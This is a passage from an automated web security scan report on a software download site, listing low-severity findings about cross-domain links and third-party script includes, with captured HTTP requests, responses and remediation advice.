Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23124

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</script>
           <a href="http://www.addthis.com/bookmark.php" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" onclick="return addthis_sendto()" rel="nofollow"><img src="http://s7.addthis.com/static/btn/lg-bookmark-en.gif" width="125" height="16" border="0" alt="64-bit download" style="vertical-align:middle;"/></a>

           
            |  <a href="http://www.addthis.com/feed.php?pub=kicko&h1=http%3A%2F%2Fwww.x64bitdownload.com%2Frss%2Fdownloads.xml&t1=" title="Subscribe using any feed reader!" rel="nofollow"><img src="http://s7.addthis.com/static/btn/lg-rss-en.gif" width="125" height="16" border="0" alt="Latest 64-bit downloads RSS" style="vertical-align:middle;"/></a>
...[SNIP]...
<p style="padding-bottom:10px;">
                       <a href="http://www.liutilities.com/affcb/?id=DSgen&aff=2736&xat=gen" rel="nofollow" target="_blank" class="link01">
                           <img src="http://www.liutilities.com/partners/affiliate/affiliateCentre/assets/graphics/ds-en/box_120x165.jpg" width="120" height="165" alt="FREE driver update scan!" border="0"/><br/>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

4.2. http://www.x64bitdownload.com/software-advanced.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/software-advanced.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.x64bitdownload.com/software-advanced.html?subcategory_id=44&category_id=3&s=d

The response contains the following links to other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://s7.addthis.com/js/152/addthis_widget.js
http://s7.addthis.com/static/btn/lg-bookmark-en.gif
http://s7.addthis.com/static/btn/lg-rss-en.gif
http://www.addthis.com/bookmark.php
http://www.addthis.com/feed.php?pub=kicko&h1=http%3A%2F%2Fwww.x64bitdownload.com%2Frss%2Fdownloads.xml&t1=
http://www.liutilities.com/affcb/?id=DSgen&aff=2736&xat=gen
http://www.liutilities.com/partners/affiliate/affiliateCentre/assets/graphics/ds-en/box_120x165.jpg

Request

GET /software-advanced.html?subcategory_id=44&category_id=3&s=d HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:21:51 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30804

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</script>
           <a href="http://www.addthis.com/bookmark.php" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" onclick="return addthis_sendto()" rel="nofollow"><img src="http://s7.addthis.com/static/btn/lg-bookmark-en.gif" width="125" height="16" border="0" alt="64-bit download" style="vertical-align:middle;"/></a>

           
            |  <a href="http://www.addthis.com/feed.php?pub=kicko&h1=http%3A%2F%2Fwww.x64bitdownload.com%2Frss%2Fdownloads.xml&t1=" title="Subscribe using any feed reader!" rel="nofollow"><img src="http://s7.addthis.com/static/btn/lg-rss-en.gif" width="125" height="16" border="0" alt="Latest 64-bit downloads RSS" style="vertical-align:middle;"/></a>
...[SNIP]...
<p style="padding-bottom:10px;">
                       <a href="http://www.liutilities.com/affcb/?id=DSgen&aff=2736&xat=gen" rel="nofollow" target="_blank" class="link01">
                           <img src="http://www.liutilities.com/partners/affiliate/affiliateCentre/assets/graphics/ds-en/box_120x165.jpg" width="120" height="165" alt="FREE driver update scan!" border="0"/><br/>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5. Cross-domain script include previous next
There are 165 instances of this issue:

/
/64-bit-archive-downloads.html
/64-bit-assembling-downloads.html
/64-bit-atom-downloads.html
/64-bit-audio-downloads.html
/64-bit-automatic-downloads.html
/64-bit-autoposter-downloads.html
/64-bit-binaries-downloads.html
/64-bit-binary-downloader-downloads.html
/64-bit-binary-downloads.html
/64-bit-board-downloads.html
/64-bit-boards-downloads.html
/64-bit-client-downloads.html
/64-bit-commander-downloads.html
/64-bit-community-downloads.html
/64-bit-complex-downloads.html
/64-bit-conference-downloads.html
/64-bit-cross-downloads.html
/64-bit-download-downloads.html
/64-bit-downloader-downloads.html
/64-bit-explorer-downloads.html
/64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html
/64-bit-fast-download-downloads.html
/64-bit-feed-downloads.html
/64-bit-feedreader-downloads.html
/64-bit-file-grabber-downloads.html
/64-bit-file-sharing-downloads.html
/64-bit-firefox-downloads.html
/64-bit-forum-c-44-newsgroup-clients-downloads.html
/64-bit-forum-downloads.html
/64-bit-forums-downloads.html
/64-bit-google-groups-downloads.html
/64-bit-grabber-downloads.html
/64-bit-group-downloads.html
/64-bit-groups-downloads.html
/64-bit-highspeed-connection-downloads.html
/64-bit-image-grabber-downloads.html
/64-bit-images-downloads.html
/64-bit-internet-c-44-newsgroup-clients-downloads.html
/64-bit-internet-downloads.html
/64-bit-kill-file-downloads.html
/64-bit-killfile-downloads.html
/64-bit-mp3-downloads.html
/64-bit-multimedia-downloads.html
/64-bit-multipart-downloads.html
/64-bit-news-c-44-newsgroup-clients-downloads.html
/64-bit-news-downloads.html
/64-bit-news-reader-downloads.html
/64-bit-newsfeed-downloads.html
/64-bit-newsgroup-c-44-newsgroup-clients-downloads.html
/64-bit-newsgroup-downloads.html
/64-bit-newsgroups-c-44-newsgroup-clients-downloads.html
/64-bit-newsgroups-downloads.html
/64-bit-newsreader-c-44-newsgroup-clients-downloads.html
/64-bit-newsreader-downloads.html
/64-bit-nntp-c-44-newsgroup-clients-downloads.html
/64-bit-nntp-downloads.html
/64-bit-nzb-downloads.html
/64-bit-ozum-downloads.html
/64-bit-par-downloads.html
/64-bit-podcast-downloads.html
/64-bit-posts-downloads.html
/64-bit-rar-downloads.html
/64-bit-reader-c-44-newsgroup-clients-downloads.html
/64-bit-reader-downloads.html
/64-bit-reading-downloads.html
/64-bit-rss-c-44-newsgroup-clients-downloads.html
/64-bit-rss-client-downloads.html
/64-bit-rss-downloads.html
/64-bit-rss-feed-reader-downloads.html
/64-bit-rss-reader-downloads.html
/64-bit-search-downloads.html
/64-bit-ssl-downloads.html
/64-bit-synchronization-downloads.html
/64-bit-synchronize-downloads.html
/64-bit-topic-downloads.html
/64-bit-troll-downloads.html
/64-bit-troll-killer-downloads.html
/64-bit-trollkiller-downloads.html
/64-bit-use-next-downloads.html
/64-bit-usenet-c-44-newsgroup-clients-downloads.html
/64-bit-usenet-downloads.html
/64-bit-usenet-search-engine-downloads.html
/64-bit-usenext-downloads.html
/64-bit-video-downloads.html
/64-bit-xpat-downloads.html
/64-bit-yenc-downloads.html
/a-oz-insight-1768-downloads.html
/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html
/categories/free-64-bit-business-downloads-2-0-d.html
/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html
/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html
/categories/free-64-bit-communications-downloads-3-0-d.html
/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html
/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html
/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html
/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html
/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html
/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html
/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html
/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html
/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html
/categories/free-64-bit-desktop-downloads-4-0-d.html
/categories/free-64-bit-development-downloads-5-0-d.html
/categories/free-64-bit-education-downloads-6-0-d.html
/categories/free-64-bit-games-entertainment-downloads-7-0-d.html
/categories/free-64-bit-graphic-apps-downloads-8-0-d.html
/categories/free-64-bit-home-hobby-downloads-9-0-d.html
/categories/free-64-bit-multimedia-design-downloads-258-0-d.html
/categories/free-64-bit-network-internet-downloads-10-0-d.html
/categories/free-64-bit-security-privacy-downloads-11-0-d.html
/categories/free-64-bit-servers-downloads-12-0-d.html
/categories/free-64-bit-system-utilities-downloads-13-0-d.html
/categories/free-64-bit-web-development-downloads-14-0-d.html
/categories/free-64-bit-widgets-downloads-304-0-d.html
/contact.html
/download/t-64-bit-ozum-download-lhtivuds.html
/downloads/t-64-bit-communitymate-download-qeakzpwv.html
/downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html
/downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html
/downloads/t-64-bit-easytether-x64-download-byhsbuvf.html
/downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html
/downloads/t-64-bit-news-file-grabber-download-stclytop.html
/downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html
/downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html
/downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html
/downloads/t-64-bit-oovoo-download-jrletedp.html
/downloads/t-64-bit-ozum-download-lhtivuds.html
/downloads/t-64-bit-ozum-download-lhtivuds.html/x22
/downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html
/downloads/t-64-bit-pidgin-download-kkwthbed.html
/downloads/t-64-bit-rss-reader-download-avwkinlm.html
/downloads/t-64-bit-skype-download-szhzvwoz.html
/downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html
/downloads/t-64-bit-teamspeak-download-opmulwsy.html
/downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html
/downloads/t-64-bit-usenext-download-rizftkeg.html
/downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html
/downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html
/downloads/t-64-bit-windows-live-mail-download-melibvyx.html
/downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html
/downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html
/downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html
/downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html
/drivers/
/drivers/64-bit-vista-drivers.html
/featured-software.html
/linktous.html
/new-reviews.html
/new-software.html
/saved-software.html
/screenshot/communitymate-download-qeakzpwv.html
/screenshot/news-file-grabber-download-stclytop.html
/screenshot/newsgroup-commander-pro-download-rjfsmxpp.html
/screenshot/ozum-download-lhtivuds.html
/screenshot/paragon-extbrowser-download-xwigzbic.html
/screenshot/rss-reader-download-avwkinlm.html
/screenshot/trollkiller-for-firefox-download-ydeukbjf.html
/screenshot/usenext-download-rizftkeg.html
/screenshot/web-forum-reader-download-ivzgszuq.html
/screenshot/web-forum-reader-download-sqifmyiy.html
/software-advanced.html
/submit-pad-file.html
/tellafriend.html
/top-software-downloads.html

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

5.1. http://www.x64bitdownload.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:20:28 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:30:39 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 64487

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.2. http://www.x64bitdownload.com/64-bit-archive-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-archive-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:54 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22archive%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22archive%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93426

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.3. http://www.x64bitdownload.com/64-bit-assembling-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-assembling-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:36 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:48:47 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22assembling%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22assembling%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 72783

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.4. http://www.x64bitdownload.com/64-bit-atom-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-atom-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:50:19 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:00:20 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22atom%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22atom%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89319

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.5. http://www.x64bitdownload.com/64-bit-audio-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-audio-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:34 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22audio%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22audio%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96673

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.6. http://www.x64bitdownload.com/64-bit-automatic-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-automatic-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:40:47 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:50:59 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22automatic%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22automatic%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.7. http://www.x64bitdownload.com/64-bit-autoposter-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-autoposter-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:36:50 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:47:05 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22autoposter%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22autoposter%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36293

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.8. http://www.x64bitdownload.com/64-bit-binaries-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-binaries-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:04 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:17 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22binaries%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22binaries%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.9. http://www.x64bitdownload.com/64-bit-binary-downloader-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-binary-downloader-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:42 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A17%3A%22binary-downloader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A17%3A%22binary+downloader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35748

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.10. http://www.x64bitdownload.com/64-bit-binary-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-binary-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:36:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:46:34 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22binary%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22binary%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
